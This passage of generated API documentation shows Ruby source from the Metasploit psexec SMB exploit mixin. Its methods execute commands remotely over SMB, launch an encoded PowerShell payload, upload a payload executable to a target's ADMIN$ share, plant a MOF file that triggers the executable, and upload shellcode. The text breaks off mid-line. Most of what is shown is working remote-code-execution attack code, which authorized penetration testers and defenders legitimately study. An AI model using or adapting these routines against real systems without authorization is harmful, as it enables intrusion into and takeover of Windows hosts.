<span class='id identifier rubyid_output'>output</span> <span class='op'>=</span> <span class='id identifier rubyid_execute_command_with_output'>execute_command_with_output</span><span class='lparen'>(</span><span class='id identifier rubyid_text'>text</span><span class='comma'>,</span> <span class='id identifier rubyid_bat'>bat</span><span class='comma'>,</span> <span class='id identifier rubyid_command'>command</span><span class='comma'>,</span> <span class='id identifier rubyid_smbshare'>smbshare</span><span class='comma'>,</span> <span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='comma'>,</span> <span class='label'>delay:</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>CMD::DELAY</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span><span class='rparen'>)</span>
|
||
|
||
<span class='kw'>unless</span> <span class='id identifier rubyid_output'>output</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
|
||
<span class='id identifier rubyid_print_good'>print_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>Command completed successfully!</span><span class='tstring_end'>'</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Output for \"</span><span class='embexpr_beg'>#{</span> <span class='id identifier rubyid_command'>command</span> <span class='embexpr_end'>}</span><span class='tstring_content'>\":\n</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_print_line'>print_line</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_output'>output</span><span class='embexpr_end'>}</span><span class='tstring_content'>\n</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_report_note'>report_note</span><span class='lparen'>(</span>
|
||
<span class='symbol'>:rhost</span> <span class='op'>=></span> <span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='comma'>,</span>
|
||
<span class='symbol'>:rport</span> <span class='op'>=></span> <span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_port'>port</span><span class='comma'>,</span>
|
||
<span class='symbol'>:type</span> <span class='op'>=></span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>psexec_command</span><span class='tstring_end'>'</span></span><span class='comma'>,</span>
|
||
<span class='symbol'>:name</span> <span class='op'>=></span> <span class='id identifier rubyid_command'>command</span><span class='comma'>,</span>
|
||
<span class='symbol'>:data</span> <span class='op'>=></span> <span class='lbrace'>{</span> <span class='symbol'>:command_output</span> <span class='op'>=></span> <span class='id identifier rubyid_output'>output</span> <span class='rbrace'>}</span>
|
||
<span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="execute_command_with_output-instance_method">
|
||
|
||
#<strong>execute_command_with_output</strong>(text, bat, cmd, smb_share, r_ip, delay: 0, retries: 0) ⇒ <tt>Object</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
255
|
||
256
|
||
257
|
||
258
|
||
259
|
||
260
|
||
261
|
||
262
|
||
263
|
||
264
|
||
265
|
||
266
|
||
267
|
||
268
|
||
269
|
||
270
|
||
271
|
||
272</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 255</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_execute_command_with_output'>execute_command_with_output</span><span class='lparen'>(</span><span class='id identifier rubyid_text'>text</span><span class='comma'>,</span> <span class='id identifier rubyid_bat'>bat</span><span class='comma'>,</span> <span class='id identifier rubyid_cmd'>cmd</span><span class='comma'>,</span> <span class='id identifier rubyid_smb_share'>smb_share</span><span class='comma'>,</span> <span class='id identifier rubyid_r_ip'>r_ip</span><span class='comma'>,</span> <span class='label'>delay:</span> <span class='int'>0</span><span class='comma'>,</span> <span class='label'>retries:</span> <span class='int'>0</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='id identifier rubyid_execute_command'>execute_command</span><span class='lparen'>(</span><span class='id identifier rubyid_text'>text</span><span class='comma'>,</span> <span class='id identifier rubyid_bat'>bat</span><span class='comma'>,</span> <span class='id identifier rubyid_cmd'>cmd</span><span class='rparen'>)</span>
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_res'>res</span>
|
||
<span class='kw'>for</span> <span class='id identifier rubyid_i'>i</span> <span class='kw'>in</span> <span class='int'>0</span><span class='op'>..</span><span class='lparen'>(</span><span class='id identifier rubyid_retries'>retries</span><span class='rparen'>)</span>
|
||
<span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='period'>.</span><span class='id identifier rubyid_sleep'>sleep</span><span class='lparen'>(</span><span class='id identifier rubyid_delay'>delay</span><span class='rparen'>)</span>
|
||
<span class='comment'># if the output file is still locked then the program is still likely running
|
||
</span> <span class='kw'>if</span> <span class='lparen'>(</span><span class='id identifier rubyid_exclusive_access'>exclusive_access</span><span class='lparen'>(</span><span class='id identifier rubyid_text'>text</span><span class='comma'>,</span> <span class='id identifier rubyid_smb_share'>smb_share</span><span class='comma'>,</span> <span class='id identifier rubyid_r_ip'>r_ip</span><span class='rparen'>)</span><span class='rparen'>)</span>
|
||
<span class='kw'>break</span>
|
||
<span class='kw'>elsif</span> <span class='lparen'>(</span><span class='id identifier rubyid_i'>i</span> <span class='op'>==</span> <span class='id identifier rubyid_retries'>retries</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Command seems to still be executing. Try increasing RETRY and DELAY</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span>
|
||
<span class='id identifier rubyid_output'>output</span> <span class='op'>=</span> <span class='id identifier rubyid_get_output'>get_output</span><span class='lparen'>(</span><span class='id identifier rubyid_text'>text</span><span class='comma'>,</span> <span class='id identifier rubyid_smb_share'>smb_share</span><span class='comma'>,</span> <span class='id identifier rubyid_r_ip'>r_ip</span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='id identifier rubyid_cleanup_after'>cleanup_after</span><span class='lparen'>(</span><span class='id identifier rubyid_bat'>bat</span><span class='comma'>,</span> <span class='id identifier rubyid_smb_share'>smb_share</span><span class='comma'>,</span> <span class='id identifier rubyid_r_ip'>r_ip</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_output'>output</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="execute_powershell_payload-instance_method">
|
||
|
||
#<strong>execute_powershell_payload</strong> ⇒ <tt>Object</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
274
|
||
275
|
||
276
|
||
277
|
||
278
|
||
279
|
||
280
|
||
281
|
||
282
|
||
283
|
||
284
|
||
285
|
||
286
|
||
287
|
||
288
|
||
289
|
||
290
|
||
291</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 274</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_execute_powershell_payload'>execute_powershell_payload</span>
|
||
<span class='const'>ENV</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>MSF_SERVICENAME</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_NAME</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span>
|
||
<span class='id identifier rubyid_command'>command</span> <span class='op'>=</span> <span class='id identifier rubyid_cmd_psh_payload'>cmd_psh_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_encoded'>encoded</span><span class='comma'>,</span> <span class='id identifier rubyid_payload_instance'>payload_instance</span><span class='period'>.</span><span class='id identifier rubyid_arch'>arch</span><span class='period'>.</span><span class='id identifier rubyid_first'>first</span><span class='rparen'>)</span>
|
||
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>PSH::persist</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span> <span class='kw'>and</span> <span class='kw'>not</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>DisablePayloadHandler</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span>
|
||
<span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='comment'># Execute the powershell command
|
||
</span> <span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Executing the payload...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>begin</span>
|
||
<span class='id identifier rubyid_psexec'>psexec</span><span class='lparen'>(</span><span class='id identifier rubyid_command'>command</span><span class='rparen'>)</span>
|
||
<span class='kw'>rescue</span> <span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Error</span><span class='op'>::</span><span class='const'>CommunicationError</span> <span class='op'>=></span> <span class='id identifier rubyid_exec_command_error'>exec_command_error</span>
|
||
<span class='id identifier rubyid_vprint_error'>vprint_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_peer'>peer</span><span class='embexpr_end'>}</span><span class='tstring_content'> - Possibly failed to execute the specified command (error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_exec_command_error'>exec_command_error</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span> <span class='kw'>unless</span> <span class='id identifier rubyid_session_created?'>session_created?</span>
|
||
<span class='kw'>rescue</span> <span class='const'>StandardError</span> <span class='op'>=></span> <span class='id identifier rubyid_exec_command_error'>exec_command_error</span>
|
||
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Module/Failure.html#Unknown-constant" title="Msf::Module::Failure::Unknown (constant)">Unknown</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_peer'>peer</span><span class='embexpr_end'>}</span><span class='tstring_content'> - Unable to execute the specified command (error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_exec_command_error'>exec_command_error</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="initialize-instance_method">
|
||
|
||
#<strong>initialize</strong>(info = {}) ⇒ <tt>Object</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
23
|
||
24
|
||
25
|
||
26
|
||
27
|
||
28
|
||
29
|
||
30
|
||
31
|
||
32
|
||
33
|
||
34
|
||
35
|
||
36
|
||
37</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 23</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
|
||
<span class='kw'>super</span>
|
||
<span class='id identifier rubyid_register_options'>register_options</span><span class='lparen'>(</span>
|
||
<span class='lbracket'>[</span>
|
||
<span class='const'><span class='object_link'><a href="../../../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_NAME</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>The service name</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='kw'>nil</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
|
||
<span class='const'><span class='object_link'><a href="../../../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_DISPLAY_NAME</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>The service display name</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='kw'>nil</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
|
||
<span class='const'><span class='object_link'><a href="../../../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_DESCRIPTION</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Service description to be used on target for pretty listing</span><span class='tstring_end'>"</span></span><span class='comma'>,</span><span class='kw'>nil</span><span class='rbracket'>]</span><span class='rparen'>)</span>
|
||
<span class='rbracket'>]</span><span class='comma'>,</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_class'>class</span><span class='rparen'>)</span>
|
||
|
||
<span class='id identifier rubyid_register_advanced_options'>register_advanced_options</span><span class='lparen'>(</span>
|
||
<span class='lbracket'>[</span>
|
||
<span class='const'><span class='object_link'><a href="../../../../OptBool.html" title="Msf::OptBool (class)">OptBool</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../OptBool.html#initialize-instance_method" title="Msf::OptBool#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_PERSIST</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>true</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>Create an Auto run service and do not remove it.</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='kw'>false</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
|
||
<span class='const'><span class='object_link'><a href="../../../../OptInt.html" title="Msf::OptInt (class)">OptInt</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../OptBase.html#initialize-instance_method" title="Msf::OptBase#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>CMD::DELAY</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>A delay (in seconds) before reading the command output and cleaning up</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='int'>3</span><span class='rbracket'>]</span><span class='rparen'>)</span>
|
||
<span class='rbracket'>]</span><span class='comma'>,</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_class'>class</span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="mof_upload-instance_method">
|
||
|
||
#<strong>mof_upload</strong>(smb_share) ⇒ <tt>Object</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
364
|
||
365
|
||
366
|
||
367
|
||
368
|
||
369
|
||
370
|
||
371
|
||
372
|
||
373
|
||
374
|
||
375
|
||
376
|
||
377
|
||
378
|
||
379
|
||
380
|
||
381
|
||
382
|
||
383
|
||
384
|
||
385
|
||
386
|
||
387
|
||
388
|
||
389
|
||
390
|
||
391
|
||
392
|
||
393</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 364</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_mof_upload'>mof_upload</span><span class='lparen'>(</span><span class='id identifier rubyid_smb_share'>smb_share</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_share'>share</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\ADMIN$</span><span class='tstring_end'>"</span></span>
|
||
<span class='id identifier rubyid_filename'>filename</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe</span><span class='tstring_end'>"</span></span>
|
||
|
||
<span class='comment'># payload as exe
|
||
</span> <span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Trying wbemexec...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Uploading Payload...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_smb_share'>smb_share</span> <span class='op'>!=</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>ADMIN$</span><span class='tstring_end'>'</span></span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>Wbem will only work with ADMIN$ share</span><span class='tstring_end'>'</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>return</span>
|
||
<span class='kw'>end</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_connect'>connect</span><span class='lparen'>(</span><span class='id identifier rubyid_share'>share</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_exe'>exe</span> <span class='op'>=</span> <span class='id identifier rubyid_generate_payload_exe'>generate_payload_exe</span>
|
||
<span class='id identifier rubyid_fd'>fd</span> <span class='op'>=</span> <span class='id identifier rubyid_smb_open'>smb_open</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\system32\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>rwct</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='label'>write:</span> <span class='kw'>true</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_fd'>fd</span> <span class='op'><<</span> <span class='id identifier rubyid_exe'>exe</span>
|
||
<span class='id identifier rubyid_fd'>fd</span><span class='period'>.</span><span class='id identifier rubyid_close'>close</span>
|
||
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Created %SystemRoot%\\system32\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
|
||
<span class='comment'># mof to cause execution of above
|
||
</span> <span class='id identifier rubyid_mofname'>mofname</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alphanumeric'>rand_text_alphanumeric</span><span class='lparen'>(</span><span class='int'>14</span><span class='rparen'>)</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>.MOF</span><span class='tstring_end'>"</span></span>
|
||
<span class='id identifier rubyid_mof'>mof</span> <span class='op'>=</span> <span class='id identifier rubyid_generate_mof'>generate_mof</span><span class='lparen'>(</span><span class='id identifier rubyid_mofname'>mofname</span><span class='comma'>,</span> <span class='id identifier rubyid_filename'>filename</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Uploading MOF...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_fd'>fd</span> <span class='op'>=</span> <span class='id identifier rubyid_smb_open'>smb_open</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\system32\\wbem\\mof\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_mofname'>mofname</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>rwct</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='label'>write:</span> <span class='kw'>true</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_fd'>fd</span> <span class='op'><<</span> <span class='id identifier rubyid_mof'>mof</span>
|
||
<span class='id identifier rubyid_fd'>fd</span><span class='period'>.</span><span class='id identifier rubyid_close'>close</span>
|
||
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Created %SystemRoot%\\system32\\wbem\\mof\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_mofname'>mofname</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
|
||
<span class='comment'># Disconnect from the ADMIN$
|
||
</span> <span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_disconnect'>disconnect</span><span class='lparen'>(</span><span class='id identifier rubyid_share'>share</span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="native_upload-instance_method">
|
||
|
||
#<strong>native_upload</strong>(smb_share, filename, service_encoder) ⇒ <tt>Object</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
293
|
||
294
|
||
295
|
||
296
|
||
297
|
||
298
|
||
299
|
||
300
|
||
301
|
||
302
|
||
303
|
||
304
|
||
305
|
||
306
|
||
307
|
||
308
|
||
309
|
||
310
|
||
311
|
||
312
|
||
313
|
||
314
|
||
315
|
||
316
|
||
317
|
||
318
|
||
319
|
||
320
|
||
321
|
||
322
|
||
323
|
||
324
|
||
325
|
||
326
|
||
327
|
||
328
|
||
329
|
||
330
|
||
331
|
||
332
|
||
333
|
||
334
|
||
335
|
||
336
|
||
337
|
||
338
|
||
339
|
||
340
|
||
341
|
||
342
|
||
343
|
||
344
|
||
345
|
||
346
|
||
347
|
||
348
|
||
349
|
||
350
|
||
351
|
||
352
|
||
353
|
||
354
|
||
355
|
||
356
|
||
357
|
||
358
|
||
359
|
||
360
|
||
361
|
||
362</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 293</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_native_upload'>native_upload</span><span class='lparen'>(</span><span class='id identifier rubyid_smb_share'>smb_share</span><span class='comma'>,</span> <span class='id identifier rubyid_filename'>filename</span><span class='comma'>,</span> <span class='id identifier rubyid_service_encoder'>service_encoder</span><span class='rparen'>)</span>
|
||
<span class='comment'># Upload the shellcode to a file
|
||
</span> <span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Uploading payload... </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_filename'>filename</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_smbshare'>smbshare</span> <span class='op'>=</span> <span class='id identifier rubyid_smb_share'>smb_share</span>
|
||
<span class='id identifier rubyid_fileprefix'>fileprefix</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_end'>"</span></span>
|
||
<span class='comment'># if SHARE = Users/sasha/ or something like this
|
||
</span> <span class='kw'>if</span> <span class='id identifier rubyid_smbshare'>smbshare</span> <span class='op'>=~</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>.[\\\/]</span><span class='regexp_end'>/</span></span>
|
||
<span class='id identifier rubyid_subfolder'>subfolder</span> <span class='op'>=</span> <span class='kw'>true</span>
|
||
<span class='id identifier rubyid_smbshare'>smbshare</span> <span class='op'>=</span> <span class='id identifier rubyid_smb_share'>smb_share</span><span class='period'>.</span><span class='id identifier rubyid_dup'>dup</span>
|
||
<span class='id identifier rubyid_smbshare'>smbshare</span> <span class='op'>=</span> <span class='id identifier rubyid_smbshare'>smbshare</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>^[\\\/]</span><span class='regexp_end'>/</span></span><span class='comma'>,</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_folder_list'>folder_list</span> <span class='op'>=</span> <span class='id identifier rubyid_smbshare'>smbshare</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>[\\\/]</span><span class='regexp_end'>/</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_smbshare'>smbshare</span> <span class='op'>=</span> <span class='id identifier rubyid_folder_list'>folder_list</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span>
|
||
<span class='id identifier rubyid_fileprefix'>fileprefix</span> <span class='op'>=</span> <span class='id identifier rubyid_folder_list'>folder_list</span><span class='lbracket'>[</span><span class='int'>1</span><span class='op'>..</span><span class='op'>-</span><span class='int'>1</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='lbrace'>{</span><span class='op'>|</span><span class='id identifier rubyid_a'>a</span><span class='op'>|</span> <span class='id identifier rubyid_a'>a</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\</span><span class='tstring_end'>"</span></span><span class='rbrace'>}</span><span class='period'>.</span><span class='id identifier rubyid_join'><span class='object_link'><a href="../../../../../top-level-namespace.html#join-instance_method" title="#join (method)">join</a></span></span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span 